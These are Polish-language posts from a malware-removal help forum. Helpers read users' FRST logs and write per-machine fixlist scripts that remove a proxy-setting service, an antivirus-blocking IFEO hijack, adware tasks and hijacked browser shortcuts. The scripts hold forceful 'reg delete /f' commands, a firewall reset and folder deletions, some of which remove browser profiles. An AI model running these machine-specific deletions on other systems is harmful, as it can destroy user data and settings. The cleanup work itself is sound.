picasso

Głównym szkodnikiem aktywnie działającym w tle jest poniższy delikwent "Ioidasyphobiolaries". Programów nie mogłeś pobrać, bo jest aktywne proxy nałożone przez szkodnika. MBAM wykrywa tylko proxy, ale nie motor je przywracający. R2 Ioidasyphobiolaries; C:\Program Files (x86)\Ioidasyphobiolaries\Ioidasyphobiolaries.exe [281088 2015-06-16] () [File not signed] ProxyEnable: [s-1-5-21-240840061-2717004978-97619909-1000] => Internet Explorer proxy is enabled ProxyServer: [s-1-5-21-240840061-2717004978-97619909-1000] => http=127.0.0.1:9880 Widać też na dysku ślady uruchamiania lewych skanerów naciągaczy - SpyHunter i YAC (Yet Another Cleaner). Przy okazji będą usuwane też szczątki aplikacji Google Chrome i EasyBits Magic Desktop, wg Addition już odinstalowane. Log jest stanowczo za duży, więc nie wiem czy to kwestia błędu konfiguracji, czy może wysokiej aktywności innych programów (np. BitDefender). Poza tym, GMER uruchamiałeś z lokalizacji tymczasowej, on i tak zniknie podczas przetwarzania jednego z planowanych skryptów FRST: 2015-06-29 16:52 - 2014-01-28 18:36 - 00380416 _____ () C:\Users\Jarek76\AppData\Local\Temp\Rar$EXa0.329\gmer.exe Do przeprowadzenia następujące akcje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Ioidasyphobiolaries; C:\Program Files (x86)\Ioidasyphobiolaries\Ioidasyphobiolaries.exe [281088 2015-06-16] () [File not signed] S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2015-06-27] () R2 ezSharedSvc; C:\Windows\SysWOW64\ezSharedSvcHost.exe [514232 2010-04-23] (EasyBits Software AS) [File not signed] S3 btmaux; system32\DRIVERS\btmaux.sys [X] S3 cpuz136; \??\C:\Windows\TEMP\cpuz136\cpuz136_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] HKLM-x32\...\Run: [Easybits Recovery] => C:\Program Files (x86)\EasyBits For Kids\ezRecover.exe HKLM-x32\...\Run: [] => [X] HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 ShellExecuteHooks-x32: EasyBits ShellExecute Hook - {E54729E8-BB3D-4270-9D49-7389EA579090} - C:\Windows\SysWOW64\ezUPBHook.dll [52920 2011-09-04] (EasyBits Software Corp.) BootExecute: autocheck autochk * bddel.exe Task: {030BFFE6-7173-459E-8EBB-42918F3F5224} - System32\Tasks\{23C04970-E7A9-4CE7-BEAC-BBFF697125D2} => c:\program files (x86)\maxthon3\bin\maxthon.exe Task: {091003FE-1450-426E-AFE4-428B102F2009} - \SpyHunter4Startup No Task File Task: {0DB37F82-C1DD-4565-B5CC-B374F68BCBCA} - System32\Tasks\Wise Memory Optimizer Task => C:\Users\Jarek76\AppData\Local\Temp\Rar$EXa0.400\Wise Memory Optimizer\WiseMemoryOptimzer.exe Task: {2127B7EE-9239-4052-98F8-DC47FDDEE6F3} - System32\Tasks\{72EDAE04-A376-4983-BA93-49CA71A463FB} => pcalua.exe -a C:\Users\Jarek76\Downloads\sp47552.exe -d C:\Users\Jarek76\Downloads Task: {5E3E714C-4239-4ED9-9E5F-E5DE8B2463E4} - \Chromium No Task File Task: {6B5306A5-C1EA-44EB-9279-AB46E26AA9B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {7A41B7A8-51E1-4981-BD1D-B3A77DC2D838} - System32\Tasks\e-pity2013_styczen => C:\Program Files (x86)\e-file\e-pity2013\signxml.exe Task: {B67A9373-0F86-436B-8BA1-50A39F61BEC3} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe Task: {DF8E7082-2E6B-4032-A1E5-5C23E7325C21} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {E0B8F87C-009C-4A13-AFE1-8C081F2DDE13} - System32\Tasks\e-pity2013_kwiecien => C:\Program Files (x86)\e-file\e-pity2013\signxml.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\Wise Memory Optimizer Task.job => C:\Users\Jarek76\AppData\Local\Temp\Rar$EXa0.400\Wise Memory Optimizer\WiseMemoryOptimzer.exe ShortcutWithArgument: C:\Users\Jarek76\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://wikibrowser.co/restore.html ShortcutWithArgument: C:\Users\Jarek76\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://wikibrowser.co/restore.html ShortcutWithArgument: C:\Users\Jarek76\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://wikibrowser.co/restore.html HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = URLSearchHook: HKLM-x32 - Default Value = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} SearchScopes: HKU\S-1-5-21-240840061-2717004978-97619909-1000 -> {AFFC2C80-A706-4A5B-90D8-715E5CB375E0} URL = Toolbar: HKU\S-1-5-21-240840061-2717004978-97619909-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File StartMenuInternet: IEXPLORE.EXE - iexplore.exe FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll No File C:\sh4ldr C:\Program Files (x86)\Google C:\Program Files (x86)\Ioidasyphobiolaries C:\Program Files (x86)\Mozilla Firefox\extensions C:\Users\Jarek76\Start Menu\Programs\SpyHunter C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codecs for Windows 7 Pack C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KalkulatorMB C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Magic Desktop.lnk C:\Users\Jarek76\AppData\Local\Chromium C:\Users\Jarek76\AppData\Local\Google C:\Users\Jarek76\AppData\Local\WorldofTanks C:\Users\Jarek76\AppData\Roaming\privacy.xml C:\Users\Jarek76\AppData\Roaming\WorldofTanks C:\Users\Jarek76\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium C:\Users\Jarek76\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\Jarek76\Downloads\*sterownik*.exe C:\Users\Jarek76\Downloads\Setup_FileViewPro_[2015].exe C:\Users\Jarek76\Downloads\sh-remover.exe C:\Users\Jarek76\Downloads\SpyHunter-Installer.exe C:\Users\Jarek76\Downloads\yet_another_cleaner_*.exe C:\Windows\msdownld.tmp C:\Windows\system32\bddel.dat C:\Windows\System32\Drivers\EsgScanner.sys C:\Windows\SysWOW64\ezUPBHook.dll C:\Windows\SysWOW64\ezSharedSvcHost.exe C:\Windows\SysWOW64\C2MP Folder: C:\Spacekace Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: netsh advfirewall reset DisableService: PLAY ONLINE. RunOuc RemoveProxy: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Gdy Fix ukończy pracę, nastąpi restart. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Drobne deinstalacje: - Przez Panel sterowania pozbądź się przestarzałego Spybot - Search & Destroy. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadek Google Update Helper. 3. Z katalogu C:\Users\Jarek76\Downloads przez SHIFT+DEL (omija Kosz) pousuwaj powielone instalatory i wszystko co już niepotrzebne. 4. Zrób nowy log FRST z opcji Scan (zaznacz Addition, ale Shortcut już zbędny) oraz GMER (po pobraniu na Pulpit). Dołącz też plik fixlog.txt. Wypowiedz się czy nadal są problemy.

Są tu ślady pobytu trojana, który nałożył Debugger na określone wykonalne. Przypuszczalnie załatwił Cię jakiś crack. Prócz tego są też różne szczątki adware oraz ślady skanera-naciągacza SpyHunter. Wstępne akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: IFEO\AvastSvc.exe: [Debugger] nqij.exe IFEO\AvastUI.exe: [Debugger] nqij.exe IFEO\avcenter.exe: [Debugger] nqij.exe IFEO\avconfig.exe: [Debugger] nqij.exe IFEO\avgcsrvx.exe: [Debugger] nqij.exe IFEO\avgidsagent.exe: [Debugger] nqij.exe IFEO\avgnt.exe: [Debugger] nqij.exe IFEO\avgrsx.exe: [Debugger] nqij.exe IFEO\avguard.exe: [Debugger] nqij.exe IFEO\avgui.exe: [Debugger] nqij.exe IFEO\avgwdsvc.exe: [Debugger] nqij.exe IFEO\avp.exe: [Debugger] nqij.exe IFEO\avscan.exe: [Debugger] nqij.exe IFEO\bdagent.exe: [Debugger] nqij.exe IFEO\blindman.exe: [Debugger] nqij.exe IFEO\ccuac.exe: [Debugger] nqij.exe IFEO\ComboFix.exe: [Debugger] nqij.exe IFEO\egui.exe: [Debugger] nqij.exe IFEO\hijackthis.exe: [Debugger] nqij.exe IFEO\instup.exe: [Debugger] nqij.exe IFEO\keyscrambler.exe: [Debugger] nqij.exe IFEO\mbam.exe: [Debugger] nqij.exe IFEO\mbamgui.exe: [Debugger] nqij.exe IFEO\mbampt.exe: [Debugger] nqij.exe IFEO\mbamscheduler.exe: [Debugger] nqij.exe IFEO\mbamservice.exe: [Debugger] nqij.exe IFEO\MpCmdRun.exe: [Debugger] nqij.exe IFEO\MSASCui.exe: [Debugger] nqij.exe IFEO\MsMpEng.exe: [Debugger] nqij.exe IFEO\msseces.exe: [Debugger] nqij.exe IFEO\rstrui.exe: [Debugger] nqij.exe IFEO\SDFiles.exe: [Debugger] nqij.exe IFEO\SDMain.exe: [Debugger] nqij.exe IFEO\SDWinSec.exe: [Debugger] nqij.exe IFEO\spybotsd.exe: [Debugger] nqij.exe IFEO\wireshark.exe: [Debugger] nqij.exe IFEO\zlclient.exe: [Debugger] nqij.exe R1 epp64; C:\Windows\System32\DRIVERS\epp64.sys [135800 2015-06-27] (Emsisoft GmbH) R1 wfd_1_10_0_19; C:\Windows\System32\drivers\wfd_1_10_0_19.sys [61312 2015-06-16] (WN) S3 a2acc; \??\C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys [X] S1 A2DDA; \??\C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [X] R4 avkmgr; system32\DRIVERS\avkmgr.sys [X] S3 esgiguard; \??\C:\Program Files (x86)\Enigma Software Group\SpyHunter\esgiguard.sys [X] HKU\S-1-5-21-1757415873-2226878437-4207686015-1000\...\Winlogon: [shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) Task: {5D288311-75A5-4CA0-A690-741AA54BDF97} - System32\Tasks\{7E847E08-4FD9-4375-A492-55F57461E518} => D:\Program Files (x86)\MoorHunt v2\Downloads\Avira Antivirus Pro 2015 v15.0.8.624 + Key {B@tman}\avira_antivirus_pro_en.exe [2015-06-28] () Task: {A9734061-A714-46D4-9567-6AFCA2615FCA} - System32\Tasks\{C6BFAE3A-EAEC-4D8D-A37A-47D512557448} => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe Task: {FAFF8431-0CE4-47B0-B2E7-AA7086FA04AE} - System32\Tasks\{97944C17-D5D3-4BE2-8766-BFE90143C68F} => pcalua.exe -a C:\Users\DOM\Downloads\Adobe-Reader-XI(21590).exe -d C:\Users\DOM\Downloads Task: C:\Windows\Tasks\Bidaily Synchronize Task[pr].job => c:\programdata\{aa3718a5-d4cd-158f-aa37-718a5d4c6297}\7487853054165429165s.exe Task: C:\Windows\Tasks\ChoreoCraze.job => c:\programdata\{c94eb933-dd64-1a4f-c94e-eb933dd6e4cf}\cd1f.exe Task: C:\Windows\Tasks\GrubLookup.job => c:\programdata\{662f4ebd-52d1-2350-662f-f4ebd52d3af5}\5475575285673585716b.exe Task: C:\Windows\Tasks\Software Removal Tool logs upload retry.job => C:\Users\DOM\Downloads\software_removal_tool.exe Task: C:\Windows\Tasks\Update Service GoForFiles.job => C:\Program Files (x86)\GoForFilesUpdater\GoForFilesUpdater.exehttp:/www.fansfile.biz Task: C:\Windows\Tasks\UpgradeEagle.job => c:\programdata\{549f8cbd-26c2-a9b5-549f-f8cbd26c32f4}\2340391689006959689b.exe ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File ShortcutWithArgument: C:\Users\DOM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1430894263&from=wpm05063&uid=WDCXWD7500BPVT-80HXZT1_WD-WX61A61S1274S1274 CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = C:\STF380E.tmp C:\Program Files (x86)\Avira C:\Program Files (x86)\Bible Search C:\Program Files (x86)\Bing Translate To English C:\Program Files (x86)\Emsisoft Anti-Malware C:\Program Files (x86)\FREE MP3 Search C:\ProgramData\rebootpending.txt C:\ProgramData\wmzddnmb.cix C:\ProgramData\18345815274576146064 C:\ProgramData\Avira C:\ProgramData\Kaspersky Lab Setup Files C:\ProgramData\MFAData C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Half-Life 2 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mount&Blade Warband C:\Users\Default\AppData\Local\updater.log C:\Users\DOM\AppData\Local\Avg2015 C:\Users\DOM\AppData\Local\MFAData C:\Users\DOM\AppData\Roaming\appdataFr*.bin C:\Users\DOM\AppData\Roaming\msconfig.ini C:\Users\DOM\AppData\Roaming\EurekaLog C:\Users\DOM\AppData\Roaming\Microsoft\Windows\Start Menu\LuckyTab C:\Users\DOM\AppData\Roaming\Microsoft\Word\Nowy%20Dokument%20programu%20Microsoft%20Word304515483737279668\Nowy%20Dokument%20programu%20Microsoft%20Word.docx.lnk C:\Users\DOM\Desktop\PROGRAMY\Driver Checker.lnk C:\Users\DOM\Downloads\software_removal_tool.exe C:\Windows\Zone.Identifier C:\Windows\pss\6128973456579644962s.lnk.Startup C:\Windows\pss\Carb the [Filtr wulgaryzmów] Up by Harley Johnstone.lnk.Startup C:\Windows\system32\Hibiki.dll C:\Windows\system32\log C:\Windows\system32\Drivers\buceecol.sys C:\Windows\system32\Drivers\epp64.sys C:\Windows\system32\Drivers\wfd_1_10_0_19.sys C:\Windows\system32\%LocalAppData% C:\Windows\SysWOW64\avgnt.log Folder: D:\Program Files (x86)\MoorHunt v2\Downloads\Avira Antivirus Pro 2015 v15.0.8.624 + Key {B@tman} Folder: C:\Users\DOM\AppData\Local\Google\Chrome Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6C44C71-2CFE-8176-3A4D-CBD0DCE5AEFA} /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^DOM^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^6128973456579644962s.lnk" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^DOM^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Carb the [Filtr wulgaryzmów] Up by Harley Johnstone.lnk" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Napraw niepoprawnie wyczyszczony (przypuszczalnie przez AdwCleaner) specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\DOM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 3. Zrób nowy log FRST z opcji Scan - zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Odpowiedz też na następujące pytania: - Czy po w/w usuwaniu w GMER nadal są nieaktywne pola? - Czy Google Chrome jest sprawne? - jest zainstalowane, ale FRST w ogóle nie wykrywa profilu na dysku....

Przedstaw plik fixlog.txt, jak prosiłam.

Oczywiście. Ponoć pobrać programy się udało, to teraz dostarcz raporty z nich do oceny.

To nie jest kompletny zestaw FRST - mają powstać trzy logi, brakuje Addition i Shortcut.

Logi są bardzo stare, prawie sprzed miesiąca, więc nowy zestaw z FRST jak najbardziej wskazany.

Wszystko zrobione. Drobne poprawki. Otwórz Notatnik i wklej w nim: S1 wafd_1_10_0_19; system32\drivers\wafd_1_10_0_19.sys [X] BootExecute: autocheck autochk * sdnclean.exe HKU\S-1-5-21-356970189-196760685-2834952327-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_11-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0011-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_11-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_11-windows-i586.cab DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Spybot - Search & Destroy 2 RemoveDirectory: C:\ProgramData\Spybot - Search & Destroy RemoveDirectory: C:\Qoobox RemoveDirectory: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default RemoveDirectory: C:\Users\user\Desktop\Stare dane programu Firefox Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt.

jessika Pusta sekcja w Addition oznacza tylko tyle, że brak punktów Przywracania systemu, nie jest 100% miarodajna w ocenie stanu Przywracania. Log FRST jest bardzo ograniczony, robiony gównie pod kątem ingerencji malware, więc przedstawia tylko dwa scenariusze - czy Przywracanie jest wyłączone (normalnie via opcje - w Addition, lub via polityki GPO - w FRST.txt) oraz notuje dysfunkcję WMI. Usterek Przywracania, których log FRST nie wykaże (prezentując tylko pustą sekcję, a nawet i może się pokazać lista starych punktów), jest multum np. wyłączone usługi (tylko po deaktywacji Whitelist można to sprawdzić), usunięte z rejestru klucze powiązanych usług lub klas, brak plików Przywracania, nieprawidłowe uprawnienia, uszkodzona lista dostawców, etc. ki99 Temat przenoszę do działu Windows. To nie jest problem infekcji. Zacznij od podstawowych akcji ograniczających procesy: 1. Odinstaluj zbędny McAfee Security Scan Plus. Rozważ też pozbycie się firmowych programów, z których nie korzystasz, np. aplikacje CyberLink wprowadziły dużo obiektów startowych. 2. W Autoruns wyłącz zbędne wpisy startowe: ----> W karcie Logon odznacz te pozycje: HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink) HKLM-x32\...\Run: [RemoteControl8] => C:\Program Files (x86)\CyberLink\PowerDVD8\PDVD8Serv.exe [91432 2009-04-15] (CyberLink Corp.) HKLM-x32\...\Run: [PDVD8LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD8\Language\Language.exe [50472 2009-04-15] (CyberLink Corp.) HKLM-x32\...\Run: [updatePPShortCut] => C:\Program Files (x86)\CyberLink\PowerProducer\MUITransfer\MUIStartMenu.exe [218408 2008-12-03] (CyberLink Corp.) HKLM-x32\...\Run: [uCam_Menu] => C:\Program Files (x86)\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [222504 2009-05-19] (CyberLink Corp.) HKLM-x32\...\Run: [switchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated) HKLM-x32\...\Run: [ACPW05EN] => C:\Program Files (x86)\ACD Systems\ACDSee Pro\5.0\ACDSeeProInTouch2.exe [822384 2011-11-17] (ACD Systems) HKU\S-1-5-21-885473801-1135821649-2530607942-1001\...\Run: [GG] => C:\Users\Kasia\AppData\Local\GG\Application\gghub.exe [3381824 2014-08-14] (GG Network S.A.) Startup: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tworzenie wycinków ekranu i uruchamianie programu OneNote 2007.lnk [2014-09-17] ----> W karcie Services odznacz: AdobeARM, c2cautoupdatesvc, c2cpnrsvc, SkypeUpdate, SwitchBoard. ----> W karcie Scheduled Tasks odznacz zadania: Adobe, Google, Samsung. ----> W karcie Drivers skasuj szczątkowy sterownik Pandy zgłaszający błędy kompatybilności: PSKMAD. Dodatkowo usuń z dysku plik C:\Windows\System32\DRIVERS\PSKMAD.sys. Po wszystkich operacjach zresetuj system, by sprawdzić rezultaty. 3. Może tu być też problem ze sterownikami graficznymi AMD (sugerowana aktualizacja), gdyż w Dzienniku zdarzeń pojawiają się takie oto błędy: System errors: ============= Error: (06/28/2015 05:33:21 PM) (Source: atikmdag) (EventID: 10261) (User: ) Description: Display is not active Error: (06/25/2015 09:22:15 AM) (Source: atikmdag) (EventID: 19468) (User: ) Description: CPLIB :: General - Invalid Parameter 4. Jeśli zaś chodzi o defekt Przywracania systemu: Application errors: ================== Error: (06/28/2015 08:32:58 AM) (Source: System Restore) (EventID: 8193) (User: ) Description: Nie można utworzyć punktu przywracania (Proces = C:\windows\system32\svchost.exe -k netsvcs; Opis = Windows Update; Błąd = 0x80070422). Kod 0x80070422 sugeruje wyłączoną usługę powiązaną. Start > w polu szukania wpisz services.msc > z prawokliku Uruchom jako Administrator > wyszukaj usługi Dostawca kopiowania w tle oprogramowania firmy Microsoft, Dysk wirtualny, Kopiowanie woluminów w tle, z dwukliku wejdź do ich Właściwości i przyznaj im start Ręczny.

jessika To nie są nazwy obiektów na dyskach (ani foldery, ani pliki) tylko nagłówki organizujące sekcje pokazujące nazwy ogólne dysków, by łatwo się czytało spisy która lista z którego dysku pochodzi. Początkowo na każdym z dysków figurował po jednym nieukrytym pliku LNK (komendy attrib więc zbędne, bo nic ukrytego nie było). Skoro usunęłaś te pliki LNK, wszystkie trzy urządzenia są całkowicie puste i pod nagłówkami nic nie ma. jogo Na przyszłość proszę czytać zasady działu i dostarczać to co jest tu obowiązkowe. Logi z przestarzałego OTL w ogóle nie są brane pod uwagę. Obowiązkowe są FRST i GMER - FRST w pierwszym poście niekompletny (ani głównego raportu, ani Shortcut). Prócz powyższego Fixlist proszę jeszcze: 1. Odinstaluj zbędne programy oraz stare wersje: Adobe Flash Player ActiveX (stary), Ad-Aware (jest już Avira), Bing Bar (firmowy zbędnik), Java 7 Update 71 (stary), McAfee Security Scan Plus (sponsorowany wtręt). 2. Po akcjach zrób nowy log FRST z opcji Scan - zaznacz pola Addition + Shortcut, by powstały trzy logi.

Raster, wchodząc na dane forum proszę czytać zasady: KLIK. Przestarzały OTL w ogóle nie jest tu brany pod uwagę. Obowiązujące tu raporty: FRST i GMER.

Kluczy usług Zapory nie brakuje, ale FSS nie jest zdolny w ogóle wykazać naruszeń w uprawnieniach. Ten błąd może być związany właśnie z uprawnieniami. Zacznij od użycia ServicesRepair (wbudowany reset SetACL), zresetuj system i podaj rezultaty.

Ten Fix był uruchamiany dwa razy - czyżbyś przetwarzał ten ze skasowanego posta, który miał błędy? Wg raportów komponenty MBAM są aktywne: R2 MBAMScheduler; E:\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-04-14] (Malwarebytes Corporation) R2 MBAMService; E:\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation) R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2015-04-14] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [136408 2015-06-29] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2015-04-14] (Malwarebytes Corporation) Jeśli nadal jest z nim problem, to go przeinstaluj, bo malware już zostało pomyślnie usunięte. Czy na pewno po usunięciu malware nadal jest problem z wolnym startem? Zrób nowy log FRST ale na innym ustawieniu pokazującym wszystkie usługi - tzn. odznacz pole Whitelist przy Services.

